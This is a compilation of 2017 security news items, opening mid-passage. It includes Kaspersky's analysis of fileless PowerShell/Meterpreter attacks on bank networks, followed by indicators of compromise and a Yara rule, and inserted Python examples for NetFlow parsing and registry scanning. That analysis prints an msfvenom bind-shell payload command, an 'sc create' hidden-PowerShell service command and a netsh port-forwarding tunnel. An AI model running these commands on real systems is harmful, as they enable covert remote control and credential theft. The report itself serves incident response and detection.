But it will not have 100% certainty about who downloaded what there. A given IP address may belong to a company or a household, but unfortunately also to a single specific individual. This change also rules out deploying an active device through which all traffic would flow, as well as a passive device that would eavesdrop on all communication on a link. In practice it would probably mean that ISPs would send traffic information from their routers via NetFlow or sFlow, a fairly common procedure used for network monitoring. It is true, though, that for some ISPs whose routers lack this functionality it may be a technical complication.
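To make the metadata-versus-content distinction concrete, here is an added example (not from the article, and not any operator's export) that decodes a NetFlow v5 datagram of the kind a router would send: each record carries source and destination addresses, ports, protocol, packet and byte counters and timing, and nothing from the payload. `build_packet` only constructs the sample datagram; the two flows in it are invented.

```python
"""Added example (not from the article): parse a NetFlow v5 export datagram to show
exactly which fields a flow record exposes (addresses, ports, counters) and which it
cannot (payload)."""
import socket
import struct

# NetFlow v5 wire format: 24-byte header followed by `count` 48-byte records.
HEADER = struct.Struct("!HHIIIIBBH")   # version, count, sys_uptime, unix_secs, unix_nsecs,
                                        # flow_sequence, engine_type, engine_id, sampling
RECORD = struct.Struct("!IIIHHIIIIHHBBBBHHBBH")  # see field list in parse_netflow_v5


def ip_to_int(dotted):
    return struct.unpack("!I", socket.inet_aton(dotted))[0]


def parse_netflow_v5(packet):
    """Return a list of flow dicts from one NetFlow v5 datagram."""
    version, count, *_ = HEADER.unpack_from(packet, 0)
    if version != 5:
        raise ValueError(f"not NetFlow v5 (version={version})")
    flows = []
    for i in range(count):
        (src, dst, _nexthop, _in_if, _out_if, pkts, octets, first, last, sport, dport,
         _pad1, tcp_flags, proto, _tos, _src_as, _dst_as, _src_mask, _dst_mask, _pad2) = \
            RECORD.unpack_from(packet, HEADER.size + i * RECORD.size)
        flows.append({
            "src": socket.inet_ntoa(struct.pack("!I", src)),
            "dst": socket.inet_ntoa(struct.pack("!I", dst)),
            "sport": sport, "dport": dport, "proto": proto,
            "packets": pkts, "bytes": octets,
            "duration_ms": last - first,     # first/last are router uptime in ms
            "tcp_flags": tcp_flags,
        })
    return flows


def build_packet(flows):
    """Construct a v5 datagram as a router would emit it (sample input only)."""
    body = b""
    for src, dst, sport, dport, proto, pkts, octets, first, last, flags in flows:
        body += RECORD.pack(ip_to_int(src), ip_to_int(dst), 0, 1, 2, pkts, octets, first, last,
                            sport, dport, 0, flags, proto, 0, 0, 0, 24, 24, 0)
    header = HEADER.pack(5, len(flows), 100000, 1486854900, 0, 1, 0, 0, 0)
    return header + body


# Constructed flows: one TLS connection to a web server, one DNS query.
SAMPLE = build_packet([
    ("192.0.2.10", "198.51.100.20", 51514, 443, 6, 12, 4300, 1000, 1800, 0x1B),
    ("192.0.2.10", "198.51.100.53", 52000, 53, 17, 1, 78, 900, 900, 0),
])
```

The first record says that 192.0.2.10 spoke TLS to 198.51.100.20 for 800 ms and moved 4,300 bytes; it does not say which site behind that address, which user on that LAN, or what was requested, which is precisely the limitation the author describes.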

The second change concerns the creation of an advisory body, which should also include experts from the operators and which would issue expert opinions on proposed deployments of the equipment. My slight criticism of this provision is that it does not say more precisely who will sit on this body. Practice would clarify it, but I would prefer it to state clearly that, for example, representatives of the national and governmental CERT teams would be included.

The third change is the publication of an annual report on the measures taken. Again, this is obviously a good step, although it is a pity that the proposed wording is very brief on this point. I would consider it better if the report also included a list of the serious attacks that the equipment helped detect or eliminate.

In any case, I welcome the committee's conclusion. I still think it would be better to ensure this country's cyber defence and security by other mechanisms, but this amendment clearly improves the bill.


Spam is back, at its highest level in 7 years, and one in ten messages carries malware
8.2.2017 Root.cz Spam

Every second, 3,500 unsolicited e-mails are sent worldwide, and one in ten of them is malicious. Spam now accounts for more than 65 percent of all e-mail sent, returning to 2010 levels.
The volume of spam is growing again. After relatively quiet years it has increased several-fold. While an average of 500 spam messages per second were sent during 2015, 3,500 are sent now. At least that is what the Cisco 2017 Annual Cybersecurity Report shows, confirming findings by the Cisco Talos team from September 2016.

Spam volume is growing again
According to the report, attackers' drive for maximum profit is now clearly visible. "Cyber attackers' tactics today resemble business models aimed at maximising profit. They exploit new opportunities, but also rely on old tricks such as spam, which today accounts for 65% of all e-mail sent," the report says. In volume, spam is back at levels last seen seven years ago, in 2010.

Moreover, between 8 and 10 percent of spam directly carries malware, which attackers add as an attachment. This is how all manner of malicious code spreads, and software displaying unwanted advertising is on the rise.

More dangerous unwanted advertising
Malicious software that displays unwanted advertising (adware) is on the rise, and is more dangerous than before. Attackers have begun to use adware as a first step toward infecting systems with a more advanced type of malware. One example is the DNSChanger malware, which lets an attacker control network traffic.

DNSChanger appears only on devices that were previously infected with adware. Its harmfulness is nevertheless greatly underestimated, and researchers found that in 75% of organisations adware is present on at least one device. 130 organisations of various sizes and across industries were examined.

Attackers are also making more use of online advertising to spread malicious software (malvertising). Malvertising lets attackers quickly expand the pool of potential victims. In a campaign of this scale they can also switch rapidly between the servers distributing the malware, reducing the risk of detection. The ShadowGate campaign, for example, targeted millions of users worldwide.

The study also examined the impact of successful cyber attacks on the revenues not only of large companies but also of small and medium enterprises. Almost a quarter (22%) of organisations that suffered a successful attack lost customers, and 40% of those lost more than a fifth of their customer base. Their revenues fell similarly: 29% of successfully attacked organisations reported lower revenue, and 38% of those lost more than 20% of revenue. "Although the losses caused by cyber attacks are significant, our study found that as many as 44% of security incidents are ignored and never investigated. Yet a thorough analysis of an attack that has been weathered is essential for an organisation to improve its security measures," says Milan Habrcetl, security expert at Cisco ČR.

The most widespread exploit kits are retreating, new ones are arriving
The study found that the most widespread tools for distributing malware (exploit kits) have almost vanished. The Angler, Nuclear, Neutrino and RIG exploit kits used to be among the most used; in November 2016, however, RIG was the only one still active.

The retreat of the Angler exploit kit is linked to the arrest, in spring 2016, of 50 Russian hackers who used the Lurk malware to attack Russian banks. Cisco researchers found close ties between the Lurk malware and the Angler exploit kit.

That does not mean attacker activity has decreased. Other kits are taking Angler's place, for example Sundown, Sweet Orange and Magnitude. Like RIG, these exploit kits target vulnerabilities in Microsoft Internet Explorer, Flash and the Silverlight application platform.

Many different products, and the cloud
The study's findings show that 55% of organisations use security products from more than 5 vendors, and 3% even reported products from more than 50 vendors. Paradoxically, a complex security architecture can help attackers by giving them more time and room to launch an attack: not all products are compatible with each other, and not every device on the network is protected by every installed security product.

Such a situation also makes it harder for organisations to find security specialists, because working with many tools significantly raises the qualifications required. "And it is precisely the shortage of specialists that security directors see as one of the main constraints on building quality security," says Milan Habrcetl. In the survey, 25% of respondents confirmed this. Other constraints mentioned were a limited budget (38%), system compatibility problems (28%) and required certifications (25%).

At the same time, the number of cloud applications deployed is rising. The number of cloud applications used by employees has increased more than tenfold in two years. The Cisco CloudLock security team examined 900 organisations: in October 2014 their employees used 20,400 different cloud applications, while in October 2016 the figure was roughly 222,000. More than a quarter of them (27%) were rated high-risk. Securing the growing volume of cloud traffic is therefore among the main concerns of security managers.


Russia Detains Nine 'Hackers' Over $17 Million Bank Thefts

8.2.2017 Securityweek Hacking
Russia has detained nine people alleged to be part of a cybercrime ring accused of stealing some $17 million dollars from bank accounts, the interior ministry said Wednesday.

The detentions followed a nationwide manhunt. The FSB security agency launched a major operation last year against the alleged 50-strong "hacker group" that pilfered more than one billion rubles ($16.8 million, 15.8 million euros) since 2013, the statement said.

"Nine individuals suspected of participating in hacking attacks were detained on January 25," ministry spokeswoman Irina Volk said. One was placed under arrest.

A total of 27 members and organizers are being investigated, with 19 of them now under arrest in pre-trial jail, the ministry said.

Unnamed security sources on Wednesday told Russian agencies that the latest arrests are connected to a case against legendary hacking collective Lurk that was targeted by law enforcement agencies in a sweep last year.

According to cybersecurity giant Kaspersky, the group was reportedly suspected of stealing some three billion rubles from commercial organisations that included banks.

Russian hackers are in the spotlight over their alleged involvement in cyberattacks targeting the US presidential election campaign but experts say the vast majority of cybercrime in the country is financial.

The FSB itself is also currently caught up in another murky scandal that has seen at least two of its top cybersecurity experts arrested for treason linked to the United States, a lawyer involved in the case has said.

That treason case has also seen the arrest of Ruslan Stoyanov -- the head of Kaspersky's cybersecurity unit that probed Lurk.


Sophos to Acquire Invincea for up to $120 Million

8.2.2017 Securityweek Virus
IT security firm Sophos announced on Wednesday that it has agreed to acquire Invincea, a provider of endpoint security solutions that leverage virtual containers to protect against advanced malware and other threats.

Under the terms of the agreement Sophos will pay $100 million in cash to buy the endpoint protection firm, with a possible $20 million earn-out.

Headquartered in Fairfax, Va., Invincea was founded by chief executive officer Anup Ghosh, and has raised more than $50 million in funding.

Invincea’s flagship product, X, uses “deep learning neural networks and behavioral monitoring” to detect previously unseen malware and stop attacks.

According to Kris Hagerman, chief executive officer at Sophos, Invincea’s technology will strengthen Sophos' recently launched Intercept X product, which includes a set of next-generation technologies such as signature-less anti-malware, anti-exploit and anti-ransomware protection.

“The Invincea machine learning malware detection and prevention technology will be fully integrated into the Sophos endpoint protection portfolio,” Sophos explained. “The availability of Invincea technology through the Sophos Central security management platform will further enhance the Sophos synchronized security portfolio and real-time intelligence sharing.”

"Invincea was created to address sophisticated threats from nation state actors and cyber criminals that were successfully evading traditional network and antivirus solutions," Ghosh wrote in a blog post. "We understood that signature based defenses were nearing the end of their useful life, and alternative non-signature based solutions were needed."

Norm Laudermilch, chief operating officer and head of product development at Invincea added, "Invincea set out to disrupt the traditional approach to antivirus, and even now no single technology is enough to fully protect customers. I share the Sophos vision for bringing together a powerful ensemble of next-gen technologies to dramatically improve the overall effectiveness of endpoint protection. Along with our world-class technical team at Invincea, I'm looking forward to joining Sophos and helping deliver on this ambitious and exciting vision."

Sophos said it would retain Invincea’s office in Fairfax, and Ghosh and COO Norm Laudermilch will join Sophos in key leadership positions.

For Invincea customers, the Invincea endpoint security portfolio will continue to be supported and sold by Invincea and available via Invincea's channel partners.

Invincea Labs, a division of Invincea that invents, prototypes and engineers technologies for government and industry, has been separately managed and operated since 2012, and is not part of this transaction.


Iranian hackers are back with the MACDOWNLOADER MAC malware
8.2.2017 Securityweek Apple

An Iranian espionage group has been using an unsophisticated strain of malware, dubbed MacDownloader, to steal credentials and other data from Mac users.
A cyber espionage group linked to the Iranian Government has been using an unsophisticated strain of malware, dubbed MacDownloader, to steal credentials and other data from Mac computers.

The researchers Claudio Guarnieri and Collin Anderson have analyzed the malicious code that was disguised by nation-state hackers as a Flash Player update and a Bitdefender adware removal tool.

The attacks analyzed by the two researchers were mainly focused on the defense industrial base sector, but it is known that the same threat was used against a human rights advocate.

According to the researchers, the malware was “poorly” developed towards the end of 2016, and the experts noticed that its code was copied from other sources. At the time the analysis was written, MacDownloader was undetected by the virus scanning engines on VirusTotal; at the time I was writing, just a dozen vendors had recognized the bogus Flash Player and Bitdefender apps as a threat.

Once the MacDownloader infects a device, the malware collects information about the host, including passwords stored in the Keychain.

“MacDownloader seems to be poorly developed and created towards the end of 2016, potentially a first attempt from an amateur developer. In multiple cases, the code used has been copied from elsewhere. The simple activity of downloading the remote file appears to have been sourced from a cheat sheet. The main purpose of MacDownloader seems to be to perform an initial profiling of the infected system and collection of credentials from macOS’s Keychain password manager – which mirrors the focus of Windows malware developed by the same actors.” reads the analysis published by the security duo.

The malicious code was first spotted on a fake website of the aerospace firm United Technologies Corporation, the same site that was used in the past to spread Windows malware and the Browser Exploitation Framework (BeEF).

The malware researchers linked the MacDownloader with the activity of an Iranian threat actor known as Charming Kitten (aka Newscaster and NewsBeef).

The Newscaster group made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

Iranian hackers used a network of fake accounts (the NEWSCASTER network) on the principal social media platforms to spy on US officials and political staff worldwide, as reported in an analysis by iSIGHT Partners. The Charming Kitten group is also known for the abuse of open source security tools, including BeEF.

The analysis of the malware revealed that the authors attempted to implement remote update and persistence capabilities, but neither feature works.

“It appears that the application contains an unused attempt to install persistent access to the victim host. One segment provides a poorly-implemented shell script to save a response from the C2 and mark it for persistence by writing an entry in the /etc/rc.common file. In theory, every time the infected computer would start up, the shell script would be launched to download a file from a remote location, check if it changed from the previous iteration, and if so execute that new implant. While we haven’t managed to obtain a proper response from the server before it was taken offline, our initial investigation did not find a subsequent implant.” states the analysis.

The experts have collected evidence that links the malware to other Iranian threat actors, including the Iran Cyber Security Group and Flying Kitten (aka Rocket Kitten).


“Of particular note are wireless networks named Jok3r and mb_1986. Jok3r corresponds with a member of a defacement group, Iran Cyber Security Group, who continues to be fairly active in vandalizing sites. Iran Cyber Security Group also, as with many other defacement groups later identified as involved in state-aligned campaigns, purports to provide commercial security services and penetration testing training.” states the report.

“The “mb_1986″ wireless name is more interesting, as it provides a connection to earlier Iranian campaigns, overlapping with the Flying Kitten actor group and subsequent malware activity in summer 2014.”

The report also includes the IoCs, enjoy it!


Absolute Extends Self-Healing Capabilities to Third-Party Software

8.2.2017 securityweek Security
Vancouver, Canada-based endpoint security company Absolute announced this week the launch of a new product that provides self-healing capabilities to third-party security and management applications.

Absolute’s Persistence technology is embedded in the firmware of over one billion PCs and mobile devices from manufacturers such as Dell, ASUS, HP, Microsoft, Lenovo, Acer, Samsung, Toshiba, Panasonic and Fujitsu. This approach aims to ensure that IT teams are provided uncompromised visibility and real-time remediation capabilities for devices, data and applications.

The company’s Absolute Device & Data Security (DDS) product is designed to allow organizations to monitor endpoints and data stored on computers and cloud storage devices, and quickly address incidents.

Absolute has now announced the availability of Application Persistence, a product that provides self-healing capabilities to third-party endpoint controls, including antiviruses, VPNs, encryption, and management tools.

A recent study has shown that more than half of enterprises have at least six agents installed on their endpoints, and when one of these agents is removed or compromised, the organization can remain exposed to further attacks.

Absolute’s technology aims to address the risk by allowing endpoint agents to repair themselves when removed or compromised by external actors or insider threats, giving enterprises more control over their endpoints, including improved visibility and real-time remediation. Furthermore, it provides IT teams the capabilities needed to ensure that compliance requirements are met.

The company says the self-healing capabilities work even if the machine is not on the corporate network, its firmware is flashed, the hard drive is replaced, or the operating system is reinstalled.

Absolute said its Application Persistence product has already been tested by organizations in the healthcare, financial services and manufacturing industries. The product is available worldwide to enterprises, OEMs, security firms, and independent software vendors (ISVs).


Fileless attacks against enterprise networks
8.2.2017 Kaspersky Virus
During incident response, a team of security specialists needs to follow the artefacts that attackers have left in the network. Artefacts are stored in logs, memory and hard drives. Unfortunately, each of these storage media has a limited timeframe during which the required data is available. One reboot of an attacked computer will make memory acquisition useless. Several months after an attack the analysis of logs becomes a gamble because they are rotated over time. Hard drives store a lot of needed data and, depending on the activity on the disk, forensic specialists may extract data up to a year after an incident. That’s why attackers are using anti-forensic techniques (or simply SDELETE) and memory-based malware to hide their activity during data acquisition. A good example of the implementation of such techniques is Duqu2. After dropping on the hard drive and starting its malicious MSI package, it removes the package from the hard drive by renaming the file and leaves part of itself in memory together with a payload. That’s why memory forensics is critical to the analysis of malware and its functions. Another important part of an attack is the tunnels that attackers install in the network. Cybercriminals (like Carbanak or GCMAN) may use PLINK for that. Duqu2 used a special driver for that. Now you may understand why we were very excited and impressed when, during an incident response, we found that memory-based malware and tunnelling were implemented by attackers using Windows standard utilities like “SC” and “NETSH“.

Description

This threat was originally discovered by a bank’s security team, after detecting Meterpreter code inside the physical memory of a domain controller (DC). Kaspersky Lab’s product detection names for this kind of threat are MEM:Trojan.Win32.Cometer and MEM:Trojan.Win32.Metasploit. Kaspersky Lab participated in the forensic analysis after this attack was detected, discovering the use of PowerShell scripts within the Windows registry. Additionally, it was discovered that the NETSH utility was used for tunnelling traffic from the victim’s host to the attacker’s C2.

We know that the Metasploit framework was used to generate scripts like the following one:

 

This script allocates memory, resolves Windows API functions and downloads the Meterpreter utility directly into RAM. This kind of script may be generated by using the Metasploit Msfvenom utility with the following command line options:

msfvenom -p windows/meterpreter/bind_hidden_tcp AHOST=10.10.1.11 -f psh-cmd
After the successful generation of a script, the attackers used the SC utility to install a malicious service (that will execute the previous script) on the target host. This can be done, for example, using the following command:

sc \\target_name create ATITscUA binpath= "C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQA…" start= manual
The next step after installing the malicious service would be to set up tunnels to access to the infected machine from remote hosts, for example using the following command:

netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.10.1.12 connectport=8080 listenaddress=0.0.0.0
That would result in all network traffic arriving at 10.10.1.11:4444 being forwarded to 10.10.1.12:8080. This technique of setting up proxy tunnels provides the attackers with the ability to control any PowerShell-infected host from remote Internet hosts.

The use of the “SC” and “NETSH” utilities requires administrator privileges on both the local and the remote host. The use of malicious PowerShell scripts also requires privilege escalation and execution policy changes. In order to achieve this, attackers used credentials of service accounts with administrative privileges (for example backup, the service for the remote task scheduler, etc.) grabbed by Mimikatz.
 

Features

The analysis of memory dumps and Windows registries from affected machines allowed us to restore both Meterpreter and Mimikatz. These tools were used to collect passwords of system administrators and for the remote administration of infected hosts.

In order to get the PowerShell payload used by the attackers from the memory dumps, we used the following BASH commands:

cat mal_powershell.ps1_4 | cut -f12 -d" " | base64 -di | cut -f8 -d\' | base64 -di | zcat - | cut -f2 -d\( | cut -f2 -d\" | less | grep \/ | base64 -di | hd
Resulting in the following payload:

 

Part of a code responsible for downloading Meterpreter from “adobeupdates.sytes[.]net”

Victims

Using the Kaspersky Security Network we found more than 100 enterprise networks infected with malicious PowerShell scripts in the registry. These are detected as Trojan.Multi.GenAutorunReg.c and HEUR:Trojan.Multi.Powecod.a. The table below shows the number of infections per country.
 

However we cannot confirm that all of them were infected by the same attacker.

Attribution

During our analysis of the affected bank we learned that the attackers had used several third-level domains and domains in the .GA, .ML and .CF ccTLDs. The trick of using such domains is that they are free and have no WHOIS information after domain expiration. Given that the attackers used the Metasploit framework, standard Windows utilities and unknown domains with no WHOIS information, attribution is almost impossible. The closest groups with the same TTPs are GCMAN and Carbanak.

Conclusions

Techniques like those described in this report are becoming more common, especially against relevant targets in the banking industry. Unfortunately the use of common tools combined with different tricks makes detection very hard.

In fact, this attack can be detected only in RAM, on the network and in the registry. Please check the Appendix I – Indicators of Compromise section for more details on how to detect malicious activity related to this fileless PowerShell attack.

After successful disinfection and cleaning, it is necessary to change all passwords. This attack shows how no malware samples are needed for successful exfiltration from a network and how standard and open source utilities make attribution almost impossible.

Further details of these attacks and their objectives will be presented at the Security Analyst Summit, to be held on St. Maarten from 2 to 6 April, 2017.

More information about this attack is available to customers of Kaspersky APT Intelligence Services. For a subscription inquiry, contact: intelreports (at) kaspersky [dot] com.

Appendix I – Indicators of Compromise

To find the host used by an attacker using the technique described for remote connections and password collection, the following paths in the Windows registry should be analyzed:

HKLM\SYSTEM\ControlSet001\services\ – path will be modified after using the SC utility
HKLM\SYSTEM\ControlSet001\services\PortProxy\v4tov4\tcp – path will be modified after using the NETSH utility
In unallocated space in the Windows registry, the following artefacts might be found:

powershell.exe -nop -w hidden -e
10.10.1.12/8080
10.10.1.11/4444
Please note that these IPs are taken from the IR case in which we participated, so another attacker may use any other IP. These artefacts indicate the use of PowerShell scripts as a malicious service and the use of the NETSH utility for building tunnels.

Verdicts:

MEM:Trojan.Win32.Cometer
MEM:Trojan.Win32.Metasploit
Trojan.Multi.GenAutorunReg.c
HEUR:Trojan.Multi.Powecod
Appendix II – Yara Rules


rule msf_or_tunnel_in_registry
{
strings:
$port_number_in_registry = "/4444"
$hidden_powershell_in_registry = "powershell.exe -nop -w hidden" wide
condition:
uint32(0)==0x66676572 and any of them
}
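Added example (not code from the Kaspersky report): the Appendix I registry indicators and the msf_or_tunnel_in_registry rule above re-implemented in Python, so a hive or a carve of unallocated hive space can be triaged without Yara, and the base64 argument of the hidden PowerShell service command is decoded for the analyst. The hive fragment, the service ImagePath and the encoded script are constructed assumptions, not the real case data.

```python
"""Python re-implementation of the msf_or_tunnel_in_registry logic.

Checks a raw registry hive buffer for the 'regf' signature and the two
indicators from Appendix I (the ascii '/4444' PortProxy artefact and the
UTF-16LE 'powershell.exe -nop -w hidden' service command), then decodes the
-e argument that follows a hit. The sample hive bytes are constructed below
and only mimic the relevant strings, not the real hive layout.
"""
import base64
import re
from typing import Dict, List, Optional

HIVE_MAGIC = b"regf"                    # uint32(0) == 0x66676572 in the rule
PORT_IOC = b"/4444"                     # $port_number_in_registry (ascii)
PS_IOC_WIDE = "powershell.exe -nop -w hidden".encode("utf-16-le")  # "wide"
ENCODED_CMD_RE = re.compile(r"-e\s+([A-Za-z0-9+/=]+)")


def find_all(buf: bytes, needle: bytes) -> List[int]:
    """Return every offset at which needle occurs in buf."""
    hits, start = [], 0
    while (idx := buf.find(needle, start)) >= 0:
        hits.append(idx)
        start = idx + 1
    return hits


def decode_encoded_command(buf: bytes, offset: int) -> Optional[str]:
    """Given the offset of a wide hidden-PowerShell hit, read the UTF-16LE
    text that follows it, extract the base64 passed to -e and decode it
    (psh-cmd payloads encode the script as UTF-16LE before base64)."""
    text = buf[offset:offset + 8192].decode("utf-16-le", errors="ignore")
    m = ENCODED_CMD_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_hive(buf: bytes) -> Dict[str, object]:
    """Apply the rule: the buffer must start with 'regf' and contain at least
    one indicator. Offsets and decoded commands are returned so the analyst
    can pivot to the malicious service and the PortProxy tunnel."""
    ps_hits = find_all(buf, PS_IOC_WIDE)
    port_hits = find_all(buf, PORT_IOC)
    decoded = [c for c in (decode_encoded_command(buf, o) for o in ps_hits) if c]
    is_hive = buf[:4] == HIVE_MAGIC
    return {
        "is_hive": is_hive,
        "hidden_powershell_offsets": ps_hits,
        "port_proxy_offsets": port_hits,
        "decoded_commands": decoded,
        "matches_rule": is_hive and bool(ps_hits or port_hits),
    }


def build_sample_hive(with_indicators: bool = True) -> bytes:
    """Constructed stand-in for a SYSTEM hive fragment (assumption: value
    names are stored as 8-bit strings and REG_SZ data as UTF-16LE, which is
    why the rule matches '/4444' ascii and the PowerShell string wide)."""
    buf = bytearray(HIVE_MAGIC + b"\x00" * 4092)      # 4 KiB base block
    if with_indicators:
        # Service ImagePath as SC would write it; the script is a harmless
        # constructed stand-in, not the attackers' payload.
        script = "Write-Output 'constructed sample'"
        enc = base64.b64encode(script.encode("utf-16-le")).decode()
        image_path = ("C:\\Windows\\system32\\cmd.exe /c start /b /min "
                      f"powershell.exe -nop -w hidden -e {enc}")
        buf += b"ImagePath\x00" + image_path.encode("utf-16-le") + b"\x00\x00"
        # PortProxy\v4tov4\tcp entry as netsh stores it: value name
        # "listenaddress/listenport", data "connectaddress/connectport".
        buf += b"0.0.0.0/4444" + "10.10.1.12/8080".encode("utf-16-le") + b"\x00\x00"
    else:
        benign = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
        buf += b"ImagePath\x00" + benign.encode("utf-16-le") + b"\x00\x00"
    return bytes(buf)


if __name__ == "__main__":
    result = scan_hive(build_sample_hive())
    print("matches rule:", result["matches_rule"])
    for cmd in result["decoded_commands"]:
        print("decoded -e command:", cmd)
```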


Iranian Hackers Use Mac Malware to Steal Data

8.2.2017 securityweek Virus


A cyber espionage group linked to Iran has been using an unsophisticated piece of malware named MacDownloader to steal credentials and other data from Mac computers.

The malware was analyzed by Claudio Guarnieri and Collin Anderson, researchers specializing in Iranian surveillance and espionage campaigns targeting human rights, foreign policy and civil society entities.

MacDownloader, disguised by attackers as a Flash Player update and a Bitdefender adware removal tool, was created towards the end of 2016. Much of the code has been copied from other sources and experts believe this could be an amateur developer’s first attempt at creating a piece of malware.

When Guarnieri and Anderson conducted their analysis, the malware had not been known to any of the security products on VirusTotal. At the time of writing, nearly a dozen vendors have flagged the fake Flash Player and Bitdefender apps as malicious.

MacDownloader was first spotted on a fake website of aerospace firm United Technologies Corporation, which had previously delivered Windows malware. The same host had also been used to deploy the Browser Exploitation Framework (BeEF) on sites apparently belonging to the U.S. Air Force and a dental office.

While the attacks observed by Guarnieri and Anderson appear to be targeted at the defense industrial base sector, the experts are aware of reports that it has also been used against a human rights advocate.

Evidence suggests that the macOS malware is tied to Charming Kitten, aka Newscaster and NewsBeef, an Iranian threat actor known for creating fake personas on social networking websites in an effort to harvest information from targeted individuals in the US, Israel, the UK, Saudi Arabia and Iraq. Charming Kitten is also known for using BeEF.

Once it infects a device, the malware harvests information about the system, including processes and applications, and collects passwords stored in the Keychain. The Windows malware used by the group is similar, collecting saved credentials and browser history from Chrome and Firefox.

While its code shows that the developers of MacDownloader have attempted to implement remote update and persistence capabilities, these mechanisms don’t appear to be functional.

Researchers have found links between MacDownloader and other threat actors believed to be located in Iran, including the Iran Cyber Security Group, which specializes in defacing websites, and Flying Kitten (aka Rocket Kitten), which is known for targeting organizations in the Middle East and NATO countries.


Valve is going to fix a serious vulnerability in Steam online gaming platform
8.2.2017 securityweek Vulnerability

The online game platform Steam is fixing a serious bug that could be exploited to redirect users to malicious websites and take over their profile.
The popular online game platform Steam is going to fix a serious vulnerability that could be exploited by hackers to redirect users to malicious websites, use their market funds, and also change their profile.

It seems that the XSS flaw in Steam profiles has been only partially fixed: the flaw was patched on the initial activity feed pages, but it is still present on subsequent pages.

The attackers can exploit the flaw by inserting JavaScript and other malicious code into their profiles, then the code is executed without any warning on the computers of anyone who visits the booby-trapped page.

The vulnerability was first reported in a Reddit thread this week, and experts observed that in a few hours after its disclosure many people were creating profiles that contained the code to trigger the vulnerability.

According to Ars, most of the exploit pages just redirect visitors to a site with PHP code that prompts them to download an unknown file.

“Such redirections, however, are possibly only a small sample of what the underlying exploit makes possible. One Reddit participant said here and here that viewing malicious profiles could force people to make purchases using their Steam market funds.” Ars reported.

Clearly, the flaw in the Steam platform could also be exploited to steal the authentication cookies of visitors and take control of their accounts.

It is expected that the number of infected profiles will grow rapidly, because it is enough for a user to visit an existing malicious profile.


The Steam platform has already been exploited by hackers in the past to launch cyber attacks. In October 2016, the malware researcher Lawrence Abrams discovered a Reddit user who was warning of the existence of hacked Steam accounts used to spread a Remote Access Trojan (RAT).

In March 2016, the security expert at Kaspersky Lab Santiago Pontiroli and the independent security researcher Bart P published an interesting analysis of malware targeting the Steam gaming platform and the evolution of these threats over the last few years.

Valve estimated that nearly 77,000 accounts are hijacked and pillaged each month.

Back to the present: Steam users who think they may have visited a malicious profile are urged to check their settings and should change their passwords. I always suggest also enabling two-factor authentication to avoid ugly surprises.


Thousands of WordPress Sites Hacked Using Recently Disclosed Vulnerability
8.2.2017 thehackernews Hacking
Last week, we reported on a critical zero-day flaw in WordPress that was silently patched by the company before hackers could get their hands on the nasty bug and exploit millions of WordPress websites.
To ensure the security of millions of websites and its users, WordPress delayed the vulnerability disclosure for over a week and worked closely with security companies and hosts to install the patch, ensuring that the issue was dealt with in short order before it became public.
But even after the company's effort to protect its customers, thousands of admins did not bother to update their websites, which remain vulnerable to the critical bug that has already been exploited by hackers.
While WordPress includes a default feature that automatically updates unpatched websites, some admins running critical services disable this feature in order to test patches before applying them.
Even the news blog of the well-known Linux distribution openSUSE (news.opensuse.org) was hacked, but it was restored immediately without a breach of any other part of openSUSE's infrastructure, CIO reports.
The vulnerability resided in the WordPress REST API and allowed an unauthenticated attacker to delete or modify all pages on unpatched websites and redirect their visitors to malicious exploits, opening the door to a large number of attacks.

The security researcher at Sucuri, who privately disclosed the flaw to WordPress, said they started noticing the attacks leveraging this bug less than 48 hours after disclosure. They noticed at least four different campaigns targeting still unpatched websites.
In one such campaign, hackers succeeded in replacing the content of over 66,000 web pages with "Hacked by" messages. The remaining campaigns have targeted roughly 1000 pages in total.
Besides defacing websites, such attacks appear to be carried out mostly for black hat SEO campaigns, in order to spread spam and gain search engine ranking, which is also known as search engine poisoning.
"What we expect to see is a lot more SEO spam (Search Engine Poisoning) attempts moving forward," explained Daniel Cid, CTO, and founder of Sucuri.
"There’s already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability."
So, site administrators who have not yet updated their websites to the latest WordPress release 4.7.2 are urged to patch them immediately before becoming the next target of SEO spammers and hackers.


U.S. Could Ask Visa Applicants for Social Media Passwords

8.2.2017 securityweek Social
US embassies could ask visa applicants for passwords to their own social media accounts in future background checks, Homeland Security Secretary John Kelly said Tuesday.

Kelly said the move could come as part of the effort to toughen vetting of visitors to screen out people who could pose a security threat.

He said it was one of the things under consideration especially for visitors from seven Muslim majority countries with very weak background screening of their own -- Iran, Iraq, Libya, Somalia, Sudan, Syria and Yemen.

"We're looking at some enhanced or some additional screening," Kelly told a hearing of the House Homeland Security Committee. "We may want to get on their social media, with passwords," he said.

"It's very hard to truly vet these people in these countries, the seven countries... But if they come in, we want to say, what websites do they visit, and give us your passwords. So we can see what they do on the internet."

"If they don't want to cooperate, then they don't come in" to the United States, he said.

Kelly stressed that no decision had been made on this, but said tighter screening was definitely in the future, even if it means longer delays for awarding US visas to visitors.

"These are the things we are thinking about," he said.

"But over there we can ask them for this kind of information and if they truly want to come to America, then they will cooperate. If not, next in line."

The seven countries were targeted in President Donald Trump's January 27 immigrant and refugee ban order, which has since been at least temporarily blocked under court order.


Google Challenges Search Warrant Ruling

8.2.2017 securityweek Security
Google is planning to appeal a ruling made Friday that it must comply with search warrants involving customer data stored on servers outside of the United States. The case is similar to an earlier case involving Microsoft. In July 2016, the 2nd U.S. Circuit Court of Appeals in New York said Microsoft could not be forced to turn over emails stored on a server outside of the US. Now, however, Magistrate Judge Thomas Rueter in Philadelphia has taken the opposite view with Google.

Both cases involve search warrants issued under the 1986 Stored Communications Act (SCA). Microsoft was also initially ordered to comply. It appealed, and eventually Judge Susan Carney of the appeals court said that the SCA does not give US courts authority to force internet companies in the United States to seize customer email contents stored on foreign servers. At the time, Microsoft chief legal officer Brad Smith said, "It makes clear that the US Congress did not give the US Government the authority to use search warrants unilaterally to reach beyond US borders."

